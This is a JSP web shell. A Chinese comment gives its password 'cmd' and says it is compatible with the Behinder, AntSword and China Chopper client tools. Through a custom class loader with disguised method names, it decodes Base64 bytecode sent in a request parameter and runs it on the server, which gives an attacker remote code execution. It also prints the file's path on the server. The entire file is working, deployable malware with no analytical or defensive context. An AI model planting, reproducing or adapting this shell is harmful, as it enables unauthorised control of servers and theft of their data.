<% out.print("HIyou"); %> <%-- 连接密码: cmd 适配冰蝎/蚁剑/中国菜刀/JSP马 --%> <%@ page import="java.io.*" %> <% out.println("im here:
"); out.println(application.getRealPath(request.getServletPath())); %> <%! class SEQUENCE extends ClassLoader{ SEQUENCE(ClassLoader c){super(c);} public Class video(byte[] b){ return super.defineClass(b, 0, b.length); } } public byte[] brevity(String str) throws Exception { Class base64; byte[] value = null; try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str }); } catch (Exception e) { try { base64=Class.forName("java.util.Base64"); Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null); value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str }); } catch (Exception ee) {} } return value; } %> <% String cls = request.getParameter("cmd"); if (cls != null) { new SEQUENCE(this.getClass().getClassLoader()).video(brevity(cls)).newInstance().equals(new Object[]{request,response}); } %>